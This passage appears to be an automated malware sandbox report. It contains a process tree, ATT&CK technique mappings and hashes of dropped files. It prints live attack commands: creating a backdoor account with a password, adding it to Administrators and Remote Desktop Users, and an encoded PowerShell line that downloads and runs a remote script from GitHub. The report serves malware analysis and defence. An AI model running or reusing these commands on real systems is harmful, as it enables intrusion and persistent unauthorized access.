  - Suspicious use of WriteProcessMemory
  PID:3164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:3732

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc OJEmWOf8 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:5068
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc OJEmWOf8 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc OJEmWOf8 /add
    3⤵
    PID:4880

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:4460
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:1712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:5108

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" UTKBEBLO$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2404
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" UTKBEBLO$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:1612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" UTKBEBLO$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2176

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2344
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:4640

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc OJEmWOf8
1⤵
PID:3564
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc OJEmWOf8
  2⤵
  PID:3684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc OJEmWOf8
    3⤵
    PID:4532

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:932
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:456

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2132
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4220

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4100
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESCE8B.tmp

Filesize
1KB

MD5
947b82d79203751cb30303286c304cf9

SHA1
416f2d5c9bb615dcfaf4bbd9c94e90c74e5e5940

SHA256
8d9b289e5a11c58d9d79db61018a1c7d0cd3baacd84ca14d0df16eb525cd67e7

SHA512
e97532993c9b76650d4c643e583f145d22cdf810e33ea7b9fd48005fdf6f3d78504d01232511333711678fa23c31c2101cf7f2baf7a7639a52de5776e271e334

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vferhsox.1df.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kfo5agx2\kfo5agx2.dll

Filesize
3KB

MD5
a723d0fc86924578390c387edfbc9098

SHA1
40f730c548c2105821d9e84f9ac2d814b92d3949

SHA256
eb6cccf8e375f918f34b7d5d116cce0c35a87fc4c783e2693c0fb55a57801f9b

SHA512
a07b0e3a4501f9ec9fc24ed4af91cfd6a1eaa215ba8412274e6177fcd43a0e537309303eaa7bfbad1e00c115e32ebafa5ae38e4f28b9b4aa9f1540941840cadf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
6938a2a0fa3adc1ab9cc3bb479ff0e74

SHA1
37e2117cf83cdf1a631a394ce6f0c57f70ee3f47

SHA256
df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068

SHA512
5509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
70d1bf1c7a95f0613358ac07bc3864ad

SHA1
52783a6ace472471ad68b602c604e48340737596

SHA256
88e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3

SHA512
ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
58b4c6a70f55d70a401015da300261b2

SHA1
a13b8a1a577c3638c311f5e668b61cea8a532d35

SHA256
9eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0

SHA512
0ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIF8D7.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kfo5agx2\CSCF7B62A6194F54BA48E4DC850AF71813F.TMP

Filesize
652B

MD5
a6ad02e3800b57d5a90900685f235bba

SHA1
5999008dcc247477e0a89aeb27a99885fa3007ef

SHA256
b60fc16f40e1267d43f0faa1112e757edaa33e742be73614b313917d7977656a

SHA512
f8c55984d58a47cbed518bcc54bc3c85999bf67afdab72f1938c6324a974d8c6e8e48890d06ac9c07807269880dba3b8415bda82c39c8e39830d972e93e84f52

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kfo5agx2\kfo5agx2.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kfo5agx2\kfo5agx2.cmdline

Filesize
369B

MD5
a9fc4ed5d3123b75140f948736431045

SHA1
97a4fe5aae9f2947d02077303bdd8b845e03a6b1

SHA256
e950309d99fc68f5846407089e9b3eaa41bd317f85aaaf11e3e34b8e9108d2cd

SHA512
4d4c9d0cc46cb181225cb211226a4ab5822839d5bdf3ea0a1c41b767d20d3b3894e055a6b43ce4cae752f90b6f320af132107ca814f7aa23783cd82f0ca20fc2

Download Submit
memory/1020-39-0x00000147B7470000-0x00000147B767A000-memory.dmp

Filesize
2.0MB

Download
memory/1020-86-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/1020-18-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/1020-17-0x000001479E8C0000-0x000001479E8E2000-memory.dmp

Filesize
136KB

Download
memory/1020-135-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/1020-35-0x000001479E8B0000-0x000001479E8B8000-memory.dmp

Filesize
32KB

Download
memory/1020-25-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/1020-38-0x00000147B70E0000-0x00000147B7256000-memory.dmp

Filesize
1.5MB

Download
memory/1020-19-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/1020-90-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/1020-20-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/1020-87-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/2024-4-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/2024-2-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/2024-3-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/2024-0-0x00007FF8DF773000-0x00007FF8DF775000-memory.dmp

Filesize
8KB

Download
memory/2024-50-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/2024-49-0x00007FF8DF773000-0x00007FF8DF775000-memory.dmp

Filesize
8KB

Download
memory/2024-1-0x0000020F772E0000-0x0000020F77706000-memory.dmp

Filesize
4.1MB

Download
memory/2024-5-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download
memory/2024-137-0x00007FF8DF770000-0x00007FF8E0231000-memory.dmp

Filesize
10.8MB

Download